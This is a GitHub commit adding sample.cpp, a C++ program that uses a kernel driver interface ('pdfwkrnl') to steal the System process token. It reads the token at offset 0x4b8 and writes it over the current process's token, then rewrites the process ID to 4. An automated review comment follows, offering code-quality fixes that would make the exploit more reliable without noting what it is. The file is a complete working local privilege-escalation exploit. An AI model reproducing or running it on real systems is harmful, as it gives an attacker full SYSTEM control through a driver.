Create sample.cpp

Add a sample of what can be done with this.
This commit is contained in:
dpcpointer
2025-06-03 19:07:00 -06:00
committed by GitHub
parent 5d793d7097
commit bfc85219bb

109
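--- a/sample.cpp
+++ b/sample.cpp
@@ -0,0 +1,109 @@
+#include "PdFwKrnl.h"
+typedef struct _EX_FAST_REF {
+union {
+VOID* Object;
+ULONGLONG RefCnt : 4;
+ULONGLONG Value;
+};
+}EX_FAST_REF, *PEX_FAST_REF;
+int main(void) {
+if (!pdfwkrnl::attach()) {
+printf(STR("failed to attach to driver \n"));
+return -1;
+}
+PVOID* ntoskrnl_object = nullptr;
+PVOID* current_process_object = nullptr;
+uint64_t current_process_pid = GetCurrentProcessId();
+uint64_t ntoskrnl_pid = 4;
+EX_FAST_REF ntoskrnl_token{};
+EX_FAST_REF current_process_token{};
+printf(STR("starting exploit \n"));
+printf(STR("getting ntoskrnl object \n"));
+pdfwkrnl::call_kernel_function<NTSTATUS>(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)4, &ntoskrnl_object);
+if (!ntoskrnl_object) {
+printf(STR("failed to obtain ntoskrnl object \n"));
+return pdfwkrnl::detach();
+}
+printf(STR("obtained ntoskrnl object @ %p \n"), ntoskrnl_object);
+printf(STR("getting ntoskrnl token \n"));
+ntoskrnl_token = pdfwkrnl::read<EX_FAST_REF>((uint64_t)ntoskrnl_object + 0x4b8);
+if (!ntoskrnl_token.Object) {
+printf(STR("failed to obtain ntoskrnl token \n"));
+return pdfwkrnl::detach();
+}
+printf(STR("obtained ntoskrnl token | object @ %p \n"), ntoskrnl_token.Object);
+printf(STR("current process pid %d \n"), current_process_pid);
+printf(STR("ntoskrnl pid %d \n"), 4);
+printf(STR("getting current process object \n"));
+pdfwkrnl::call_kernel_function<NTSTATUS>(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)current_process_pid, &current_process_object);
+if (!current_process_object) {
+printf(STR("failed to obtain current process object \n"));
+return pdfwkrnl::detach();
+}
+printf(STR("obtained current process object @ %p \n"), current_process_object);
+printf(STR("getting current process token \n"));
+current_process_token = pdfwkrnl::read<EX_FAST_REF>((uint64_t)current_process_object + 0x4b8);
+if (!current_process_token.Object) {
+printf(STR("failed getting current process token \n"));
+return pdfwkrnl::detach();
+}
+printf(STR("overwriting current process token with ntoskrnl's token \n"));
+if (!pdfwkrnl::write((uint64_t)current_process_object + 0x4b8, &ntoskrnl_token, sizeof(EX_FAST_REF))) {
+printf(STR("failed overwriting current process token \n"));
+return pdfwkrnl::detach();
+}
+printf(STR("checking if overwrite was success \n"));
+EX_FAST_REF current_process_token_temp = pdfwkrnl::read<EX_FAST_REF>((uint64_t)current_process_object + 0x4b8);
+if (current_process_token_temp.Object != ntoskrnl_token.Object) {
+printf(STR("failed overwriting current process token \n"));
+return pdfwkrnl::detach();
+}
+printf(STR("token was successfully overwriten \n"));
+printf(STR("overwriting current process's pid to ntoskrnl's \n"));
+if (!pdfwkrnl::write((uint64_t)current_process_object + 0x440, &ntoskrnl_pid, sizeof(uint64_t))) {
+printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
+return pdfwkrnl::detach();
+}
+printf(STR("checking if current process's pid was overwriten \n"));
+if (pdfwkrnl::read<uint64_t>((uint64_t)current_process_object + 0x440) != ntoskrnl_pid) {
+printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
+return pdfwkrnl::detach();
+}
+printf(STR("pid was successfully overwriten \n"));
+printf(STR("hello to two ntoskrnl's lol \n"));
+printf(STR("exploit complete bye (: \n"));
+printf(STR("enter to exit \n"));
+getchar();
+return pdfwkrnl::detach();
+}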
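Review bot: `printf(STR("current process pid %d \n"), current_process_pid)` passes a `uint64_t` to `%d`, which is undefined behaviour and prints a truncated or garbage value on every common ABI; use `%llu` (or `PRIu64`) for that line, and the `"ntoskrnl pid %d"` line is fine only because it passes the literal `4`. The `NTSTATUS` that both `call_kernel_function<NTSTATUS>(... "PsLookupProcessByProcessId" ...)` calls return is discarded, so a failed lookup is only detected indirectly through the out-pointer staying null; capture the status and check `NT_SUCCESS(status)` before the pointer is used. `0x4b8` and `0x440` are undocumented magic offsets into an opaque kernel structure whose layout is not fixed across builds, so they should at least be named constants with a comment recording which build they were taken from, otherwise a reader cannot tell that the reads and writes against them are build-dependent. Every failure path also returns `pdfwkrnl::detach()` as the process exit status, which conflates "detach succeeded" with "this step failed"; call `detach()` and then return a distinct non-zero code, e.g. `pdfwkrnl::detach(); return 1;`. `main` starts and ends inside the hunk.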